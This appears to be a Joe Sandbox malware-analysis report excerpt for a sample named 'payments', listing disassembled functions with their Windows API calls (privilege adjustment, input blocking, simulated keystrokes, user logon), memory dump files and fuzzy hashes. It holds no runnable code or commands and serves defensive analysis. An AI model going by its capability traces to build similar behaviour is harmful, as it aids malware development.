                                                                                                                          • Instruction Fuzzy Hash: 2A11BFB2500305BFE7189F94DC86D6BB7BDEB44310B20852EE05693240DB70FC428A60
                                                                                                                          Function 00CD6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD66AF
                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CD66EC
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD66F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 33631002-0
                                                                                                                          • Opcode ID: b53ee0c75b9dac813dea577ab1ea3f4c58c88fbe06c0e3d0835079d4c7103845
                                                                                                                          • Instruction ID: 116e9b57dd776989b64cc17f4b4ef5ba0acfbf648d382d3554802de7b2a8201d
                                                                                                                          • Opcode Fuzzy Hash: b53ee0c75b9dac813dea577ab1ea3f4c58c88fbe06c0e3d0835079d4c7103845
                                                                                                                          • Instruction Fuzzy Hash: 8E118EB2900328BEE7108BA8DC45FAFBBBCEB08714F004556FA11E7290C3B49A0587A5
                                                                                                                          Function 00CD71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CD7223
                                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CD723A
                                                                                                                          • FreeSid.ADVAPI32(?), ref: 00CD724A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3429775523-0
                                                                                                                          • Opcode ID: 41755e52ba5f7b543de2fe6971c54ffa89c99a725f4aea88be3f6d253ea81893
                                                                                                                          • Instruction ID: 9ac11c0553bc060f6692cfc725eef49d0f62b13c11e2eadd992c10faf3e35c2e
                                                                                                                          • Opcode Fuzzy Hash: 41755e52ba5f7b543de2fe6971c54ffa89c99a725f4aea88be3f6d253ea81893
                                                                                                                          • Instruction Fuzzy Hash: CDF01275904309FFDF04DFE4DD8AAEDBBB9EF08301F108469A602E2291E77457458B10
                                                                                                                          Function 00CDF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDF599
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CDF5C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: ccddce19dd34a311239e8659c197cfda57001f157a14501b840dc243ea6fbdfd
                                                                                                                          • Instruction ID: 3b2f023739211730e2529d572a3941b4d6e02593628496a88522f9dd2e950095
                                                                                                                          • Opcode Fuzzy Hash: ccddce19dd34a311239e8659c197cfda57001f157a14501b840dc243ea6fbdfd
                                                                                                                          • Instruction Fuzzy Hash: 8B11A131604201AFDB00EF28D845A6EB3E9FF85324F00891EF9A6D7391DB30A9058B91
                                                                                                                          Function 00CDCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CEBE6A,?,?,00000000,?), ref: 00CDCEA7
                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CEBE6A,?,?,00000000,?), ref: 00CDCEB9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3479602957-0
                                                                                                                          • Opcode ID: 59da8e413c5f92e38a357627392fc419a52c915f90d5cc5631166a663485192d
                                                                                                                          • Instruction ID: 6eb650dea71df2d68dacf3538fe9e24fdd6c9c2f516c1533ec52dd548b4e6fcb
                                                                                                                          • Opcode Fuzzy Hash: 59da8e413c5f92e38a357627392fc419a52c915f90d5cc5631166a663485192d
                                                                                                                          • Instruction Fuzzy Hash: 79F08275100329BBDB109BA4DC89FFA776EBF09351F008166F915D6281D7309A41CBA0
                                                                                                                          Function 00CD411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CD4153
                                                                                                                          • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00CD4166
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3536248340-0
                                                                                                                          • Opcode ID: db2d477f32fef1c327b6092a926625dc4a4e0e206726fa904e3e6bbf3f1d213c
                                                                                                                          • Instruction ID: 99ee69950dc0ea7e7810674701b1b6e9aa7ac100c53ebaee3fabc880bb9a1ea5
                                                                                                                          • Opcode Fuzzy Hash: db2d477f32fef1c327b6092a926625dc4a4e0e206726fa904e3e6bbf3f1d213c
                                                                                                                          • Instruction Fuzzy Hash: D2F06D7080038DAFEB059FA0C805BFE7FB1EF00305F00800AFA6596291D77986129FA0
                                                                                                                          Function 00CCAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCACC0), ref: 00CCAB99
                                                                                                                          • CloseHandle.KERNEL32(?,?,00CCACC0), ref: 00CCABAB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 81990902-0
                                                                                                                          • Opcode ID: 73b61ac6a419981f8c3f47bea669e29029f10a941f5a0b422ea2316e070963d2
                                                                                                                          • Instruction ID: 563c2ecba66256058d1ac3f311bf740748bfde88a1e667ad2c3417553e5dd67d
                                                                                                                          • Opcode Fuzzy Hash: 73b61ac6a419981f8c3f47bea669e29029f10a941f5a0b422ea2316e070963d2
                                                                                                                          • Instruction Fuzzy Hash: B6E0BF71000611BFE7262F95EC09DB6B7AAEB04324710842DF45981470DB725D929B50
                                                                                                                          Function 00CB81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00CB6DB3,-0000031A,?,?,00000001), ref: 00CB81B1
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CB81BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 1a6d546b24aa17457075f10b0ff0cf13069c453cc51ee015a5729d25bb06f303
                                                                                                                          • Instruction ID: c923e135bc2bb274d27f0a813e2f59a3c127696350f4a3213cee6c4e7c3a7337
                                                                                                                          • Opcode Fuzzy Hash: 1a6d546b24aa17457075f10b0ff0cf13069c453cc51ee015a5729d25bb06f303
                                                                                                                          • Instruction Fuzzy Hash: 09B09231144708BBDB002BE1EC09B98BF6AEB08652F108010F62D84261CF7254128AA2
                                                                                                                          Function 00C977B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memmove
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4104443479-0
                                                                                                                          • Opcode ID: 16fd2233a62fcadf142b525fb6a2f5e5df710038bdc9f2fbb49a54b665d91dd3
                                                                                                                          • Instruction ID: e630103c3929dabcc522c1893b099f31990a5d44875c8a87ba3eed8d4f6b05ca
                                                                                                                          • Opcode Fuzzy Hash: 16fd2233a62fcadf142b525fb6a2f5e5df710038bdc9f2fbb49a54b665d91dd3
                                                                                                                          • Instruction Fuzzy Hash: 09A25A75A05219DFCF24CF58C4847ADBBB1FF48310F2582A9E859AB390DB319E81DB90
                                                                                                                          Function 00CBD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dee0738ba789d3545b961eb382d2e1923c6018a967d63b32adeb58aff460ee37
                                                                                                                          • Instruction ID: 86a973145b9cc17e635f41d8206f2b3bf5a9e658aec117d343e68ec1caf6e83b
                                                                                                                          • Opcode Fuzzy Hash: dee0738ba789d3545b961eb382d2e1923c6018a967d63b32adeb58aff460ee37
                                                                                                                          • Instruction Fuzzy Hash: 24323531D29F014DD7239634D822376A288AFB73D5F15D737F82AB5AAAEF29C5834110
                                                                                                                          Function 00C996C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 674341424-0
                                                                                                                          • Opcode ID: eda14d3f5d36228393ee37b810efac0a513d8885a848edab52706373a9ba8e75
                                                                                                                          • Instruction ID: 5dafb649a698112c100fecb0da728372e1872be19f85a72f48f775b6a15d7f5e
                                                                                                                          • Opcode Fuzzy Hash: eda14d3f5d36228393ee37b810efac0a513d8885a848edab52706373a9ba8e75
                                                                                                                          • Instruction Fuzzy Hash: 2022B9716083019FDB24DF28C895B6FB7E4EF84314F144A1DF89A8B2A1DB71E944DB92
                                                                                                                          Function 00CC038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4c22713d0756dcfe0593896180ac6289627dfdb62d6c940c37bc6a5f082110f0
                                                                                                                          • Instruction ID: 53e235828b78a21688b590389272a6dfd5a197e8046e9f4d5b52a88db3d13b5f
                                                                                                                          • Opcode Fuzzy Hash: 4c22713d0756dcfe0593896180ac6289627dfdb62d6c940c37bc6a5f082110f0
                                                                                                                          • Instruction Fuzzy Hash: DEB1FF20D2AF404DD6239639DD31336B65CAFBB2D5F91D71BFC2AB4E66EB2181834180
                                                                                                                          Function 00CDB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __time64.LIBCMT ref: 00CDB6DF
                                                                                                                            • Part of subcall function 00CB344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CDBDC3,00000000,?,?,?,?,00CDBF70,00000000,?), ref: 00CB3453
                                                                                                                            • Part of subcall function 00CB344A: __aulldiv.LIBCMT ref: 00CB3473
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2893107130-0
                                                                                                                          • Opcode ID: 89c50f29e3e43a115f90b43d96e98dd613bdbc15c9636d225fafeb241d3b2721
                                                                                                                          • Instruction ID: 5946978c191372db4256b875e570ecb791c52ab7e97a60ab56861d15ccf3f514
                                                                                                                          • Opcode Fuzzy Hash: 89c50f29e3e43a115f90b43d96e98dd613bdbc15c9636d225fafeb241d3b2721
                                                                                                                          • Instruction Fuzzy Hash: 0A21AF76634610CBD729CF28C881A92B7E1EB95311B258E6DE4E5CB3C0CB74BE05DB64
                                                                                                                          Function 00CE6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • BlockInput.USER32(00000001), ref: 00CE6ACA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BlockInput
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3456056419-0
                                                                                                                          • Opcode ID: beed368c5699fc295360f88f03647ecfbc3bdf35a066717c94e180d277d4c1c5
                                                                                                                          • Instruction ID: a466023289e85da670ab6f2818e916aec1e66a35f6b7cdbbe711cafaac20a612
                                                                                                                          • Opcode Fuzzy Hash: beed368c5699fc295360f88f03647ecfbc3bdf35a066717c94e180d277d4c1c5
                                                                                                                          • Instruction Fuzzy Hash: 74E0D8352102046FC700EF5AD404D96B7ECAF747A5F04C426F905D7350DBB0F8049BA0
                                                                                                                          Function 00CD74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00CD750A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: mouse_event
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2434400541-0
                                                                                                                          • Opcode ID: 65ddfac03305c6503a0361a6ea53ac254a99b33b64116900b6f0ca800758ad0a
                                                                                                                          • Instruction ID: 26b6eeda97fb3ebb448ca6dfc187d208da902e173d12af426872e5aef5028b1c
                                                                                                                          • Opcode Fuzzy Hash: 65ddfac03305c6503a0361a6ea53ac254a99b33b64116900b6f0ca800758ad0a
                                                                                                                          • Instruction Fuzzy Hash: 46D067A416C61579E81A0725AC1FFB65549A301782FD4474B7713D92C0B9B45E01A432
                                                                                                                          Function 00CCB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CCAD3E), ref: 00CCB124
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LogonUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1244722697-0
                                                                                                                          • Opcode ID: 834bf7a281ecd5aa26f362ac437a1c7f88b4e3a4e331dfa9f13c79461a90056c
                                                                                                                          • Instruction ID: ea7b57f9f2e7687d9e09843787de18e2600f511df6e4fbf83950809213997a61
                                                                                                                          • Opcode Fuzzy Hash: 834bf7a281ecd5aa26f362ac437a1c7f88b4e3a4e331dfa9f13c79461a90056c
                                                                                                                          • Instruction Fuzzy Hash: B6D05E320A460EBEDF028FA4DC02EAE3F6AEB04700F408110FA11C50A0C771D532AB60
                                                                                                                          Function 00D0B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: NameUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2645101109-0
                                                                                                                          • Opcode ID: 5862324f76aed99d173efe0a00a1b64e3f66d6c724a5d11ed683854c62a5ef61
                                                                                                                          • Instruction ID: e7356046672644d829f44aa59a5674ecca462d5ac0a378a7817e654f52c75b77
                                                                                                                          • Opcode Fuzzy Hash: 5862324f76aed99d173efe0a00a1b64e3f66d6c724a5d11ed683854c62a5ef61
                                                                                                                          • Instruction Fuzzy Hash: BAC04CF1400209DFD751CBC4C944AEEB7BCAB08301F114091D145F1150DB70DB459B76
